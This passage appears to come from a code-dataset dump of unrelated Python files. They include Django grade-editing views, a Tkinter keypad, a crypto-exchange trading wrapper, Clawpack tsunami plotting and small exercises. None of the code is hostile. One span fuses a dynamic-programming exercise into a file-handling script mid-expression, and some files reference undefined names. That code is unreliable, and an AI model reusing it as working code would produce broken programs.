{}\n for c in condition:\n key = next(iter(c.keys()))\n dict[key] = c[key]\n return dict\n return list(map(lambda c: condition_to_dict(c), condition))\n\n\n\ndef dict_value(value):\n value = value.split('.')\n try:\n if len(value) > 1:\n for i in value:\n value = value['{}'.format(i)]\n except KeyError:\n value = None\n \n return value \n\ndef test(array):\n\n def proccess_test(item):\n for key in item.keys():\n value = dict_value(my_obj, field)\n args = item[key]\n status = getattr(Classe, '_test_{}'.format(key))(value, args)\n print(key, value, args, status)\n item[key] = status\n\n item = list(map(lambda key: item[key], item.keys()))\n return all(item)\n\n array = list(map(lambda item: proccess_test(item), array))\n return True in array\n","sub_path":"personal_codes_recipes/literal.py","file_name":"literal.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158213332","text":"from selenium import webdriver\nimport os\n\nclass RunChromeTests():\n # http://chromedriver.storage.googleapis.com/index.html\n\n def test(self):\n driverLocation = \"/Users/urieow/Documents/Webdriver/chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = driverLocation\n # Instantiate Chrome Browser Command\n driver = webdriver.Chrome(driverLocation)\n # Open the provided URL\n driver.get(\"https://letskodeit.teachable.com/p/practice\")\n\nff = RunChromeTests()\nff.test()","sub_path":"RunChromeTests.py","file_name":"RunChromeTests.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"518048166","text":"#!usr/bin/python\n#coding=utf-8\n\n\nfrom bs4 import BeautifulSoup\nfrom xml.etree.ElementTree import *\nimport xml.etree.ElementTree as et\n\nimport pygraphviz as pgv\n\ndef draw_directed_graph(xml_name):\n xml_soup = BeautifulSoup(open(xml_name) )\n \n dependencies_list = xml_soup('dependencies')\n count = 0\n directed_graph = pgv.AGraph(strict = False, directed = True)\n for dependencies in dependencies_list:\n count += 1\n tag = str(count)\n if dependencies['type'] == 'collapsed-dependencies':\n for dep in dependencies('dep'):\n directed_graph.add_edge(tag + dep.governor.renderContents(), \\\n tag + dep.dependent.renderContents() )\n\n directed_graph.layout()\n directed_graph.draw('result_57.png')\n \n \n\n\n\nif __name__ == '__main__':\n\n xml_name = 'nlp.txt.xml'\n draw_directed_graph(xml_name)\n","sub_path":"kodaira/bs_6set/part57.py","file_name":"part57.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548756272","text":"\"\"\"\n4 3\n10 3 7 5\n\"\"\"\nimport sys\nn,t=[int(item) for item in sys.stdin.readline().strip().split()]\nsample=[int(item) for item in sys.stdin.readline().strip().split()]\n\nmax_num=max(sample)\nmax_size=0\nlast_pos_num=0\nk=1\nwhile last_pos_num=arr[i] and dp[j]: \",f)\n print(\"\")\n for line in (file.readlines()[-n:]):\n print(line,end='')\nn=int(input(\"ENTER THE NO. OF LINES\"))\nname=\"textdemo.txt\"\nnlines(name,n)\n#except:\n # print(\"ERROR\")\nprint(\"\")\n\nwith open(\"textdemo.txt\", encoding=\"utf8\") as file:\n file.seek(0,0)\n wordstring=file.read()\n wordlist=wordstring.split(\" \" or \".\" or \",\" or \".\\n\" or \"'s \")\ni=0\ncount=0\nfor i in range(0,len(wordlist)):\n print(\"TOTAL \"+wordlist[i]+\"'s IN FILE-->%d\"%int(wordlist.count(wordlist[i])))\n\nprint(\"\")\ntry:\n f1=open(\"textdemo.txt\", encoding=\"utf8\")\n f2=open(\"textdemo2.txt\",\"r+\")\n f2.writelines(wordstring)\n f1.close()\n f2.close()\n print(\"COPY OPERATION PERFORMED\")\nexcept Exception:\n print(\"ERROR\")\n\n\nf1 = open(\"name.txt\", \"r+\")\nf2 = open(\"name2.txt\", \"r+\")\nprint(\"COMBINED LINES-->\")\nfor line1, line2 in zip(f1,f2):\n print(line2+line1,end=\"\")\nf1.close()\nf2.close()\n\nprint(\"\")\ni=0\nrandomlist=[]\nimport random\nfor i in range(0,10):\n randomlist.append(random.randrange(0,100))\n randomlist[i]=str(randomlist[i])\nprint(randomlist)\nprint(sorted(randomlist))\nf1=open(\"demo3.txt\",\"r+\")\nf1.writelines(randomlist)\nprint(f1.readline())\nprint(\"read\")\n#print(l)\n#for i in range(0,10):\n#l2=sorted(l2)\n#print(l2)\nf1.close()\nf1=open(\"sortedfile.txt\",\"r+\")\nf1.writelines(sorted(randomlist))\nprint(f1.readline())","sub_path":"venv/a14.py","file_name":"a14.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"320641082","text":"# Create your views here.\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django import forms\nfrom django.forms.extras.widgets import SelectDateWidget\nfrom django.utils.safestring import mark_safe\nfrom string import Template\nfrom raceresults.main.import_util import import_objects_from_excel\nfrom django import template\nfrom django.template import RequestContext\nfrom django.utils.safestring import SafeUnicode\nfrom django.contrib.auth.decorators import permission_required\n\n#import time, datetime\n#from datetime import datetime, timedelta\nimport datetime\nimport re\n\n#import models\nfrom raceresults.main.models import *\nfrom raceresults.main.dbSearchFunctions import *\nfrom raceresults.main.import_util import *\n\nfrom raceresults.main.permissions import getPermissions, errorPage, checkPermissions\n\ndef gradesView(request, club, last_name=None):\n\tcontext = {}\n\tclubObject, error = getClubId(club)\n\tcontext['club'] = clubObject\n\tcontext['clubs'] = getClubs()\n\t\n\tif request.user.is_authenticated():\n\t\tuser = request.user\n\t\tcontext['user'] = user\n\t\tpermissions, hasPermission, superUser = getPermissions(user)\n\t\tif superUser:\n\t\t\tcontext['hasPermissions'] = 'True'\n\t\telse:\n\t\t\tif hasPermission:\n\t\t\t\tclubPermissions = permissions.get(clubObject.uniqueName, None)\n\t\t\t\tif clubPermissions:\n\t\t\t\t\tif clubPermissions.manager or clubPermissions.grader or clubPermissions.membership:\n\t\t\t\t\t\tcontext['hasPermissions'] = 'True'\n\t\t\n\tif last_name:\n\t\tif last_name == 'All':\n\t\t\tcontext['riders'] = getAllClubRiders(club)\n\t\telse:\n\t\t\tcontext['riders'] = getAllClubRiders(club,last_name)\n\treturn render_to_response(\"grades/grades.html\", context, context_instance=RequestContext(request))\n\t\t\ndef gradesPageView(request, club = -1, last_name=None):\n\tcontext={}\n\tif request.user.is_authenticated():\n\t\tuser = request.user\n\t\tcontext['user'] = user\n\telse:\n\t\treturn errorPage(request, context, ['Manager', 'or', 'Grader', 'or', 'Membership'])\n\t\n\tpermissions, hasPermission, superUser = getPermissions(user)\n\tif hasPermission:\n\t\tcontext['clubs'] = getClubs()\n\t\tif superUser:\n\t\t\tcontext['gradeClubs'] = getClubs()\n\t\t\tcontext['superUser'] = True\n\t\t\tcontext['permissions'] = None\n\t\t\tif club == -1:\n\t\t\t\tclubObject = context['clubs'][0]\n\t\t\telse:\n\t\t\t\tclubObject, flag = getClubId(club)\n\t\t\t\tif flag:\n\t\t\t\t\traise Http404()\t\n\t\t\tcontext['club'] = clubObject\n\t\telse:\n\t\t\tclubs = []\n\t\t\n\t\t\tfor key, value in permissions.iteritems(): # select clubs that user has permission to manage.\n\t\t\t\tif value.manager or value.grader or value.membership:\n\t\t\t\t\tclubs.append(value.club)\n\t\t\tcontext['gradeClubs'] = clubs\n\t\t\t\n\t\t\tif club == -1: # if no club selected, check if user have permissions for own club if not choose one of the clubs that they do\n\t\t\t\tclubPermissions = permissions.get(user.athlete.club.uniqueName, None)\n\t\t\t\tif clubPermissions:\n\t\t\t\t\tif clubPermissions.manager or clubPermissions.grader or clubPermissions.membership:\n\t\t\t\t\t\tclubObject = clubPermissions.club\n\t\t\t\t\telse: # don't have permission choose first of the list that they do.\n\t\t\t\t\t\tclubObject = clubs[0]\n\t\t\telse:\n\t\t\t\tclubObject, flag = getClubId(club)\n\t\t\t\tif flag:\n\t\t\t\t\traise Http404()\n\t\t\t\tif not checkPermissions(permissions, club = clubObject, superUser = True, manager = True, grader = True, membership = True):\n\t\t\t\t\tcontext['permissions'] = permissions\n\t\t\t\t\tcontext['club'] = clubObject.uniqueName\n\t\t\t\t\treturn errorPage(request, context, [ 'Manager or Membership or Grader'])\n\t\t\tcontext['permissions'] = permissions[clubObject.uniqueName]\n\t\t\t\t\t\t\t\t\t\t\t\n\t\tcontext['club'] = clubObject\n\t\tseasons, flag = getClubSeasons(clubObject)\n\t\tif not flag:\n\t\t\tcontext['seasons'] = seasons\n\t\t\t\t\n\t\tif last_name:\n\t\t\tif last_name == 'All':\n\t\t\t\tcontext['riders'] = getAllClubRiders(clubObject.id)\n\t\t\telse:\n\t\t\t\tcontext['riders'] = getAllClubRiders(clubObject.id,last_name)\n\t\tcontext['grades'] = getGrades()\n\t\treturn render_to_response('grades/edit/gradesPage.html', context, context_instance=RequestContext(request))\n\telse:\n\t\tcontext['permissions'] = permissions\n\t\treturn errorPage(request, context, ['Manager or Membership or Grader'])\n\ndef reviewGrades(request, club, last_name=None):\n\tcontext = {}\n\tuser = request.user\n\tcontext['user'] = user\n\t\n\tclubObject, error = getClubId(club)\n\tcontext['club'] = clubObject\n\tcontext['clubs'] = getClubs()\n\t\n\tpermissions, hasPermission, superUser = getPermissions(user)\n\tif hasPermission and (superUser or \n\t\tcheckPermissions(permissions, club = clubObject, superUser = True, manager = True, grader = True, membership = True)):\n\t\tif last_name:\n\t\t\tif not superUser:\n\t\t\t\tcontext['permissions'] = permissions[clubObject.uniqueName]\n\t\t\telse:\n\t\t\t\tcontext['superUser'] = True\n\t\t\tif last_name == 'All':\n\t\t\t\tcontext['riders'] = getAllClubRiders(club)\n\t\t\telse:\n\t\t\t\tcontext['riders'] = getAllClubRiders(club,last_name)\n\t\t\tcontext['grades'] = getGrades()\n\telse:\n\t\tcontext['permissions'] = permissions\n\t\treturn errorPage(request, context, ['Manager', 'or', 'Grader', 'or', 'Membership'])\n\t\n\treturn render_to_response(\"grades/edit/editGrades.html\", context, context_instance=RequestContext(request))\n\n#ajax grade change function\t\ndef changeRiderGrades(request, rider):\n\tcontext = {}\n\tuser = request.user\n\tcontext['user'] = user\n\t\n\trider, error = getRider(rider)\n\tif not error and rider:\n\t\tpermissions, hasPermission, superUser = getPermissions(user)\n\t\tif hasPermission and (superUser or \n\t\t\tcheckPermissions(permissions, club = rider.club, superUser = True, grader = True, manager = True)):\n\t\t\tif request.method == 'POST':\n\t\t\t\tuser = request.user\n\t\t\t\tflag = True\n\t\t\t\terrorNo = 0\n\t\t\t\tgradeHistory = None\n\t\t\t\tsubGradeHistory = None\n\t\t\t\ttrackGradeHistory = None\n\t\t\t\tcriteriumGradeHistory = None\n\t\t\n\t\t\t\tgrade = request.POST.get('grade',None)\n\t\t\t\tif grade:\n\t\t\t\t\tgrade, error = getGrade(grade)\n\t\t\t\t\tif not error and not grade == rider.grade:\n\t\t\t\t\t\tif rider.grade:\n\t\t\t\t\t\t\tnote = 'Grade change:' + rider.grade.shortName + ' to ' + grade.shortName + ' by ' + user.username\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnote = 'Grade change to ' + grade.shortName + ' by ' + user.username\n\t\t\t\t\t\tgradeHistory = AthleteGradeHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\tnote = note, gradeType = 1, date = datetime.now(), current = True)\n\t\t\t\t\t\trider.grade = grade\n\t\t\t\t\n\t\t\t\tsubGrade = request.POST.get('subGrade',None)\n\t\t\t\tif subGrade:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsubGrade = int(subGrade)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tsubGrade = 1\n\t\t\t\t\tif not subGrade == rider.subGrade:\n\t\t\t\t\t\tsubGradeHistory = AthleteGradeHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\tnote = 'Sub grade change:' + str(rider.subGrade) + ' to ' + str(subGrade) + ' by ' + user.username,\n\t\t\t\t\t\t\tgradeType = 2, date = datetime.now(), current = True)\n\t\t\t\t\t\trider.subGrade = subGrade\n\t\t\t\t\n\t\t\t\ttrackGrade = request.POST.get('trackGrade',None)\n\t\t\t\tif trackGrade:\n\t\t\t\t\ttrackGrade, error = getGrade(trackGrade)\n\t\t\t\t\tif not error and not trackGrade == rider.trackGrade:\n\t\t\t\t\t\tif rider.trackGrade:\n\t\t\t\t\t\t\tnote = 'Track grade change:' + rider.trackGrade.shortName + ' to ' + trackGrade.shortName + ' by ' + user.username\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnote = 'Track grade change to ' + trackGrade.shortName + ' by ' + user.username\n\t\t\t\t\t\ttrackGradeHistory = AthleteGradeHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\tnote = note, gradeType = 3, date = datetime.now(), current = True)\n\t\t\t\t\t\trider.trackGrade = trackGrade\n\t\t\t\t\n\t\t\t\tcriteriumGrade = request.POST.get('criteriumGrade',None)\n\t\t\t\tif criteriumGrade:\n\t\t\t\t\tcriteriumGrade, error = getGrade(criteriumGrade)\n\t\t\t\t\tif not error and not criteriumGrade == rider.criteriumGrade:\n\t\t\t\t\t\tif rider.criteriumGrade:\n\t\t\t\t\t\t\tnote = 'Criterium grade change:' + rider.criteriumGrade.shortName + ' to ' + criteriumGrade.shortName + ' by ' + user.username\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnote = 'Criterium grade change to ' + criteriumGrade.shortName + ' by ' + user.username\t\n\t\t\t\t\t\tcriteriumGradeHistory = AthleteGradeHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\tnote = note, gradeType = 4, date = datetime.now(), current = True)\n\t\t\t\t\t\trider.criteriumGrade = criteriumGrade\n\t\t\n\t\t\t\tif errorNo == 0:\n\t\t\t\t\tif criteriumGradeHistory:\n\t\t\t\t\t\tcriteriumGradeHistory.save()\n\t\t\t\t\tif trackGradeHistory:\n\t\t\t\t\t\ttrackGradeHistory.save()\n\t\t\t\t\tif subGradeHistory:\n\t\t\t\t\t\tsubGradeHistory.save()\n\t\t\t\t\tif gradeHistory:\n\t\t\t\t\t\tgradeHistory.save()\n\t\t\t\t\trider.save()\t\n\t\t\n\t\t\t\t\tclub = request.POST.get('club',None)\t\n\t\t\t\t\tif club:\n\t\t\t\t\t\tclub, error = getClubId(club)\n\t\t\t\t\t\tif not error and not club == rider.club and (superUser or \n\t\t\t\t\t\t\tcheckPermissions(permissions, club = clubObject, superUser = True, membership = True)):\n\t\t\t\t\t\t\tif rider.club:\n\t\t\t\t\t\t\t\tnote = 'Changed club from: ' + rider.club.uniqueName + ' to ' + club.uniqueName + ' by ' + user.username\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnote = 'Changed club to: ' + club.uniqueName + ' by ' + user.username\t\n\t\t\t\t\t\t\tclubHistory = AthleteClubHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\t\tnote = note, date = datetime.now(), current = True)\n\t\t\t\t\t\t\trider.club = club\n\t\t\t\t\t\t\trider.save()\n\t\t\t\t\t\t\tclubHistory.save()\n\t\t\t\t\t\t\t\n\t\t\t\t\treturn render_to_response(\"comps/AJAX/yesResult.xml\", {})\n\t\t\t\t\t\t\t\t\t\t\t\n\treturn render_to_response(\"comps/AJAX/noResult.xml\", {})\n\t","sub_path":"raceresults/main/gradeViews.py","file_name":"gradeViews.py","file_ext":"py","file_size_in_byte":9270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565095548","text":"from tkinter import *\nfrom tkinter import simpledialog,Text\n\nclass NumPad(simpledialog.Dialog):\n def __init__(self,root=None,parent=None,masa=\"min\"):\n self.root=root\n self.masa = masa\n self.parent=parent\n self.top = Toplevel(master=parent.frame)\n self.top.title(masa)\n self.top.protocol(\"WM_DELETE_WINDOW\", self.OK)\n\n self.EntryFrame = Frame(self.top)\n self.BtnsFrame = Frame(self.top)\n self.createWidgets()\n self.top.wait_visibility()\n self.top.grab_set()\n\n def createWidgets(self):\n self.entry = Entry(self.EntryFrame,font=(\"Helvetica\",32),width=5,justify=CENTER)\n self.entry.pack(pady=10)\n btn_list = ['7', '8', '9', '4', '5', '6', '1', '2', '3', 'Del', '0', 'OK']\n # create and position all buttons with a for-loop\n # r, c used for row, column grid values\n r = 0\n c = 0\n n = 0\n # list(range()) needed for Python3\n btns = []\n for label in btn_list:\n # partial takes care of function and argument\n cmd = lambda x = label: self.click(x)\n btns.append(Button(self.BtnsFrame, text=label, width=10, height=5, command=cmd))\n btns[-1].grid(row=r, column=c)\n # increment button index\n n += 1\n # update row/column position\n c += 1\n if c == 3:\n c = 0\n r += 1\n self.EntryFrame.pack()\n self.BtnsFrame.pack()\n\n def click(self,label):\n if self.masa == \"min\":\n if label == 'Del':\n currentText = str(self.parent.masa_min.get())\n self.parent.masa_min.set(currentText[:-1])\n self.parent.entry_masa_min.delete(0, END)\n self.entry.delete(0,END)\n self.parent.entry_masa_min.insert(0, self.parent.masa_min.get())\n self.entry.insert(0,self.parent.masa_min.get())\n elif label == 'OK':\n self.OK()\n else:\n currentText = str(self.parent.masa_min.get())\n self.parent.entry_masa_min.delete(0,END)\n self.entry.delete(0, END)\n self.parent.masa_min.set(int(currentText+label))\n self.parent.entry_masa_min.insert(0, self.parent.masa_min.get())\n self.entry.insert(0,self.parent.masa_min.get())\n\n elif self.masa == \"max\":\n if label == 'Del':\n currentText = str(self.parent.masa_max.get())\n self.parent.masa_max.set(currentText[:-1])\n self.parent.entry_masa_max.delete(0, END)\n self.entry.delete(0, END)\n self.parent.entry_masa_max.insert(0, self.parent.masa_max.get())\n self.entry.insert(0, self.parent.masa_max.get())\n elif label == 'OK':\n self.OK()\n else:\n currentText = str(self.parent.masa_max.get())\n self.parent.entry_masa_max.delete(0,END)\n self.entry.delete(0, END)\n self.parent.masa_max.set(int(currentText+label))\n self.parent.entry_masa_max.insert(0, self.parent.masa_max.get())\n self.entry.insert(0, self.parent.masa_max.get())\n\n def OK(self):\n self.top.destroy()\n self.top.master.focus()","sub_path":"Raspberry_Pi/Raspberry_kod/raspi/NumPad.py","file_name":"NumPad.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584998010","text":"#!/usr/bin/python\nfrom binance.enums import KLINE_INTERVAL_1DAY\nfrom binance.rmt_srv import RmtSrvObj as BnbRmtSrvObj\nfrom okex.rmt_srv import RmtSrvObj as OkexRmtSrvObj\nfrom engine import Engine\n\nclass RealEngine(Engine):\n \"\"\"docstring for Engine\"\"\"\n def __init__(self, args):\n exchange = args.e\n target_coin = args.t\n base_coin = args.b\n\n if exchange == 'binance':\n self.target_coin = target_coin.upper()\n self.base_coin = base_coin.upper()\n pair = '%s%s' % (self.target_coin, self.base_coin)\n print(\"The pair is %s \" % pair)\n self.rmt_srv = BnbRmtSrvObj(pair, KLINE_INTERVAL_1DAY, 300, debug=True)\n elif exchange == 'okex':\n self.target_coin = target_coin.lower()\n self.base_coin = base_coin.lower()\n pair = '%s_%s' % (self.target_coin, self.base_coin)\n print(\"The pair is %s \" % pair)\n self.rmt_srv = OkexRmtSrvObj(pair, '1day', 7, debug=True)\n else:\n print('Wrong exchange name: %s' % exchange)\n exit(1)\n\n def get_kline(self):\n return self.rmt_srv.get_kline_pd()\n\n def get_balance(self):\n target_balance = {}\n base_balance = {}\n account = self.rmt_srv.get_account()\n for item in account:\n if self.base_coin == item['asset']:\n base_balance = {'free': item['free'], 'frozen': item['locked']}\n elif self.target_coin == item['asset']:\n target_balance = {'free': item['free'], 'frozen': item['locked']}\n if base_balance != {} and target_balance != {}:\n break\n return target_balance, base_balance\n\n \n\n def buy(self, price, amount):\n order_id = self.rmt_srv.buy(price, amount)\n return order_id\n\n def sell(self, price, amount):\n order_id = self.rmt_srv.sell(price, amount)\n return order_id\n\ndef test():\n re = RealEngine('binance', target_coin='btc', base_coin='usdt')\n df = re.get_kline()\n print(df)\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"realengine.py","file_name":"realengine.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341370948","text":"\n\"\"\" \nSet up the plot figures, axes, and items to be done for each frame.\n\nThis module is imported by the plotting routines and then the\nfunction setplot is called to set the plot parameters.\n \n\"\"\" \n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom clawpack.geoclaw import topotools\nfrom six.moves import range\n\ntry:\n TG32412 = np.loadtxt('32412_notide.txt')\nexcept:\n print(\"*** Could not load DART data file\")\n\n#--------------------------\ndef setplot(plotdata=None):\n#--------------------------\n \n \"\"\" \n Specify what is to be plotted at each frame.\n Input: plotdata, an instance of pyclaw.plotters.data.ClawPlotData.\n Output: a modified version of plotdata.\n \n \"\"\" \n\n\n from clawpack.visclaw import colormaps, geoplot\n from numpy import linspace\n\n if plotdata is None:\n from clawpack.visclaw.data import ClawPlotData\n plotdata = ClawPlotData()\n\n\n plotdata.clearfigures() # clear any old figures,axes,items data\n plotdata.format = 'ascii' # 'ascii', 'binary', 'netcdf'\n\n\n # To plot gauge locations on pcolor or contour plot, use this as\n # an afteraxis function:\n\n def addgauges(current_data):\n from clawpack.visclaw import gaugetools\n gaugetools.plot_gauge_locations(current_data.plotdata, \\\n gaugenos='all', format_string='ko', add_labels=True)\n \n\n # To add title with time format hours:minutes:seconds...\n\n def title_hours(current_data):\n from pylab import title, mod\n t = current_data.t\n hours = int(t/3600.)\n tmin = mod(t,3600.)\n min = int(tmin/60.)\n tsec = mod(tmin,60.)\n sec = int(mod(tmin,60.))\n timestr = '%s:%s:%s' % (hours,str(min).zfill(2),str(sec).zfill(2))\n title('%s after earthquake' % timestr)\n\n\n\n #-----------------------------------------\n # Figure for surface\n #-----------------------------------------\n plotfigure = plotdata.new_plotfigure(name='Surface', figno=0)\n plotfigure.kwargs = {'figsize':(12,6)}\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes('pcolor')\n plotaxes.axescmd = 'subplot(121)'\n plotaxes.title = 'Surface'\n plotaxes.scaled = True\n\n def fixup(current_data):\n addgauges(current_data)\n title_hours(current_data)\n\n plotaxes.afteraxes = fixup\n\n # Water\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = geoplot.surface_or_depth\n plotitem.pcolor_cmap = geoplot.tsunami_colormap\n plotitem.pcolor_cmin = -0.2\n plotitem.pcolor_cmax = 0.2\n plotitem.add_colorbar = False\n plotitem.amr_celledges_show = [0,0,0]\n plotitem.patchedges_show = 1\n\n # Land\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = geoplot.land\n plotitem.pcolor_cmap = geoplot.land_colors\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 100.0\n plotitem.add_colorbar = False\n plotitem.amr_celledges_show = [0,0,0]\n plotitem.patchedges_show = 0\n plotaxes.xlimits = [-120,-60]\n plotaxes.ylimits = [-60,0]\n\n # add contour lines of bathy if desired:\n plotitem = plotaxes.new_plotitem(plot_type='2d_contour')\n plotitem.show = False\n plotitem.plot_var = geoplot.topo\n plotitem.contour_levels = linspace(-3000,-3000,1)\n plotitem.amr_contour_colors = ['y'] # color on each level\n plotitem.kwargs = {'linestyles':'solid','linewidths':2}\n plotitem.amr_contour_show = [1,0,0] \n plotitem.celledges_show = 0\n plotitem.patchedges_show = 0\n\n\n #-----------------------------------------\n # Figure for adjoint flagging\n #-----------------------------------------\n\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes('adjoint')\n plotaxes.axescmd = 'subplot(122)'\n plotaxes.scaled = True\n plotaxes.title = 'Adjoint flag'\n\n def fixup(current_data):\n addgauges(current_data)\n\n plotaxes.afteraxes = fixup\n\n\n def masked_inner_product(current_data):\n from numpy import ma\n aux = current_data.aux\n tol = 1e-15\n soln = ma.masked_where(aux[3,:,:] < tol, aux[3,:,:])\n return soln\n\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = masked_inner_product\n plotitem.pcolor_cmap = colormaps.white_red\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 0.005\n #plotitem.pcolor_cmax = 0.00001 # use for adjoint-error flagging\n\n plotitem.add_colorbar = False # doesn't work when adjoint all masked\n plotitem.colorbar_shrink = 0.75\n plotitem.amr_celledges_show = [0,0,0]\n plotitem.amr_data_show = [1,1,0] # inner product not computed on finest level\n plotitem.patchedges_show = 0\n\n # Land\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = geoplot.land\n plotitem.pcolor_cmap = geoplot.land_colors\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 100.0\n plotitem.add_colorbar = False\n plotitem.amr_celledges_show = [0,0,0]\n plotitem.patchedges_show = 0\n plotaxes.xlimits = [-120,-60]\n plotaxes.ylimits = [-60,0]\n\n\n #-----------------------------------------\n # Figures for gauges\n #-----------------------------------------\n plotfigure = plotdata.new_plotfigure(name='Surface at gauges', figno=300, \\\n type='each_gauge')\n plotfigure.clf_each_gauge = True\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = 'auto'\n plotaxes.ylimits = 'auto'\n plotaxes.title = 'Surface'\n\n # Plot surface as blue curve:\n plotitem = plotaxes.new_plotitem(plot_type='1d_plot')\n plotitem.plot_var = 3\n plotitem.plotstyle = 'b-'\n\n # Plot topo as green curve:\n plotitem = plotaxes.new_plotitem(plot_type='1d_plot')\n plotitem.show = False\n\n def gaugetopo(current_data):\n q = current_data.q\n h = q[0,:]\n eta = q[3,:]\n topo = eta - h\n return topo\n \n plotitem.plot_var = gaugetopo\n plotitem.plotstyle = 'g-'\n\n def add_zeroline(current_data):\n from pylab import plot, legend, xticks, floor, axis, xlabel\n t = current_data.t \n gaugeno = current_data.gaugeno\n\n if gaugeno == 32412:\n try:\n plot(TG32412[:,0], TG32412[:,1], 'r')\n legend(['GeoClaw','Obs'],loc='lower right')\n except: pass\n axis((0,t.max(),-0.3,0.3))\n\n plot(t, 0*t, 'k')\n n = int(floor(t.max()/3600.) + 2)\n xticks([3600*i for i in range(n)], ['%i' % i for i in range(n)])\n xlabel('time (hours)')\n\n plotaxes.afteraxes = add_zeroline\n\n\n\n #-----------------------------------------\n \n # Parameters used only when creating html and/or latex hardcopy\n # e.g., via pyclaw.plotters.frametools.printframes:\n\n plotdata.printfigs = True # print figures\n plotdata.print_format = 'png' # file format\n plotdata.print_framenos = 'all' # list of frames to print\n plotdata.print_gaugenos = 'all' # list of gauges to print\n plotdata.print_fignos = 'all' # list of figures to print\n plotdata.html = True # create html files of plots?\n plotdata.html_homelink = '../README.html' # pointer for top of index\n plotdata.latex = True # create latex file of plots?\n plotdata.latex_figsperline = 2 # layout of plots\n plotdata.latex_framesperline = 1 # layout of plots\n plotdata.latex_makepdf = False # also run pdflatex?\n plotdata.parallel = True # make multiple frame png's at once\n\n return plotdata\n\n","sub_path":"tests/chile2010_adjoint/setplot.py","file_name":"setplot.py","file_ext":"py","file_size_in_byte":7750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622548346","text":"#!/usr/bin/env python3\n\nimport csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys\nimport numpy as np\n\nWALL = 'Wall time'\nSTEP = 'Step'\nVALUE = 'Value'\n\nplt.style.use('ggplot')\n\ndef key(rule):\n if rule == 'SGDMomentum': return 'momentum'\n elif rule == 'SGDNesterovMomentum': return 'nesterov'\n else: return rule.lower()\n\ndef file_name(rule, rate=None):\n if rate is not None:\n return \"{}_loss_{}.csv\".format(key(rule), rate)\n else:\n return \"{}_decay_loss.csv\".format(key(rule))\n\ndef rate_legend(name):\n rule = key(name)\n val = name.split('_')[-1].split('.')[0]\n return rule + ' ' + val[:1] + '.' + val[1:]\n\ndef best_rates():\n return {\n \"Adadelta\" : \"001\",\n \"Adagrad\" : \"001\",\n \"Adam\" : \"00001\",\n \"Adamax\" : \"0001\",\n \"AMSgrad\" : \"00001\",\n \"Eve\" : \"00001\",\n \"RMSprop\" : \"00001\",\n \"SGD\" : \"001\",\n # \"SGDMomentum\" : \"001\",\n \"SGDNesterovMomentum\" : \"001\",\n }\n\ndef plot_vloss():\n fig = plt.figure()\n ax = fig.add_subplot(111)\n legends = []\n\n rates = best_rates()\n for rule in rates:\n frame = pd.read_csv(file_name(rule))\n ax.plot(frame[STEP][::5], frame[VALUE][::5])\n legends.append(rule)\n ax.legend(legends)\n ax.set_ylabel('Validation Loss')\n ax.set_xlabel('Training Step')\n plt.show()\n # plt.savefig('resnet_loss.pdf')\n \nif __name__ == \"__main__\":\n plot_vloss()\n","sub_path":"resnet-data/plot_vloss.py","file_name":"plot_vloss.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442963563","text":"import torch.nn as nn\r\nimport torch\r\n\r\nclass NNModel(nn.Module):\r\n\r\n\t# def __init__(self, ntoken, embed_size, nhid, seq_len, initrange):\r\n\tdef __init__(self, ntoken, embed_size, nhid, seq_len, initrange, batch_size):\r\n\t\tsuper(NNModel, self).__init__()\r\n\t\tself.encoder = nn.Embedding(ntoken, embed_size) # ntoken - |V|, embed_size - pocet features\r\n\t\t\r\n\t\tself.emb2hid = nn.Linear(embed_size*seq_len, 